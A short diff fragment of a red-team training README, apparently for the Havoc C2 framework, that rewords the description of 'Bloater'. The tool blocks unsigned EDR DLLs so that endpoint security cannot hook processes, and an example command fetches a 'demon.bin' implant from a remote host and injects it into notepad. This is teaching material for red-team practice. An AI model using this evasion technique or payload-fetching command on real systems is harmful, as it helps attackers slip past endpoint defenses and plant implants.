WesleyWong420/RedTeamOps-Havoc-101/README.md

 ```

 ### Bloater
-Bloater is a wrapper used to side-load `Clicker` as a mean to demonstrate Process Mitigation Policy.
+Bloater is a wrapper used to side-load `Clicker` for demonstrating Process Mitigation Policy.
 This technique prevents security vendors from reflectively loading EDR DLLs that are not digitally signed by Microsoft.
 As a result, `kernel32.dll` and `ntdll.dll` of newly spawned processes will not be hooked by EDR vendors unless they have Intermediate Certificates handed out by Microsoft.
 ```
 C:\>Bloater.exe -f ./Clicker.exe -p 4160 -u http://192.168.231.128:9090/demon.bin -t notepad -s 4160
                                                                     _